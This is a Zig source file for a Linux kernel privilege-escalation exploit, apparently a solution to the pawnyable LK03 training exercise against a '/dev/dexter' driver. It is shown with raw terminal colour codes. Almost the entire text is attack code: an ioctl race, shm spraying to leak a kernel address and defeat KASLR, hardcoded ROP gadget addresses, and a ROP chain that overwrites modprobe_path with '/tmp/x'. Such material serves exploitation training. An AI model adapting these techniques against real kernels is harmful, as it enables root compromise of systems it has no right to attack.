�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt1�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mraceIoctl�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mreq�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mrace_is_won�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt2�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mraceCorrupt�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m&�[0m�[1m�[37mreq�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mrace_is_won�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt1�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt2�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt1�[0m�[1m�[37m.�[0m�[37mjoin�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt2�[0m�[1m�[37m.�[0m�[37mjoin�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mshm_c�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@cImport�[0m�[1m�[37m({�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@cInclude�[0m�[1m�[37m(�[0m�[33m"sys/shm.h"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@cInclude�[0m�[1m�[37m(�[0m�[33m"sys/ipc.h"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@cInclude�[0m�[1m�[37m(�[0m�[33m"sys/types.h"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mShmInfo�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37msegment�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mc_int�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37manyopaque�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mshmSpray�[0m�[1m�[37m(�[0m�[1m�[37mshms�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[37mShmInfo�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mshms�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|*�[0m�[1m�[37mshm�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mshmId�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[37mshmget�[0m�[1m�[37m(�[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[1m�[37mIPC_PRIVATE�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[1m�[37mIPC_CREAT�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[36m0o666�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mshmId�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mshm�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msegment�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mshmId�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37maddr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[37mshmat�[0m�[1m�[37m(�[0m�[1m�[37mshmId�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[1m�[37mSHM_RDONLY�[0m�[1m�[37m).�[0m�[1m�[36m?�[0m�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mshmFree�[0m�[1m�[37m(�[0m�[1m�[37mshms�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[37mShmInfo�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mshms�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mshm�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[37mshmctl�[0m�[1m�[37m(�[0m�[1m�[37mshm�[0m�[1m�[37m.�[0m�[1m�[37msegment�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[1m�[37mIPC_RMID�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mshm_c�[0m�[1m�[37m.�[0m�[37mshmdt�[0m�[1m�[37m(�[0m�[1m�[37mshm�[0m�[1m�[37m.�[0m�[1m�[37maddr�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff811481c6�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_RDX_POP_RSI_POP_RDI_POP_RBP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff810012c1�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_R10_POP_RBP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81384eec�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mADD_ADDROF_RSI_RDX�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81399ff3�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mSYSCALL_RETURN_VIA_SYSRET�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff818000fb�[0m�[1m�[37m;�[0m�[1m�[37m �[0m�[33m// similar to but not exactly the same as KPTI_TRAMPOLINE�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81e37e60�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33minline�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mmodprobe_difference�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[1m�[36m-�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesToValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"/sbin/m"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesToValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"/tmp/x�[0m�[33m\x00�[0m�[33m"�[0m�[1m�[37m))));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// we don't control the return address (rcx) so this will segfault once we return to userspace (importantly, this will not cause a kernel panic)�[0m
�[1m�[37m �[0m�[33m// when stuffing a ropchain in pt_regs this is an big advantage over commit_creds(&init_cred), which requires a clean userspace return�[0m
�[1m�[37m �[0m�[33masm�[0m�[1m�[37m �[0m�[33mvolatile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[33m""�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[33m"{r15}"�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mPOP_RDX_POP_RSI_POP_RDI_POP_RBP�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[33m"{r14}"�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mmodprobe_difference�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[33m"{r13}"�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// [junk] "{r12}" (),�[0m
�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[33m"{rbx}"�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mPOP_R10_POP_RBP�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// [junk] "{r10}" (),�[0m
�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[33m"{r9}"�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mADD_ADDROF_RSI_RDX�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[33m"{r8}"�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mSYSCALL_RETURN_VIA_SYSRET�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@call�[0m�[1m�[37m(.�[0m�[1m�[37malways_inline�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37msyscall3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSYS�[0m�[1m�[37m.�[0m�[1m�[37mlseek�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36misize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSEEK�[0m�[1m�[37m.�[0m�[1m�[37mCUR�[0m�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mgadgets�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36m*�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_RDX_POP_RSI_POP_RDI_POP_RBP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_R10_POP_RBP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mADD_ADDROF_RSI_RDX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mSYSCALL_RETURN_VIA_SYSRET�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mgadgets�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mg�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mg�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk03�[0m�[1m�[36m-�[0m�[1m�[37mtypes�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk03�[0m�[1m�[36m-�[0m�[1m�[37mrace�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk03�[0m�[1m�[36m-�[0m�[1m�[37mshm�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk03�[0m�[1m�[36m-�[0m�[1m�[37mropchain�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mfds�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mfds�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mi�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfds�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/proc/self/stat"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDONLY�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/dexter"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mshm_addrs�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m100�[0m�[1m�[37m]�[0m�[1m�[37mShmInfo�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mshmSpray�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mshm_addrs�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m32�[0m�[1m�[36m+�[0m�[1m�[36m32�[0m�[1m�[36m*�[0m�[1m�[36m2�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37moverread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minit_ipc_ns�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81eb2c00�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mreadInt�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m32�[0m�[1m�[37m..][�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mshm_file_data�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ns"�[0m�[1m�[37m)..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlittle�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37minit_ipc_ns�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base at 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
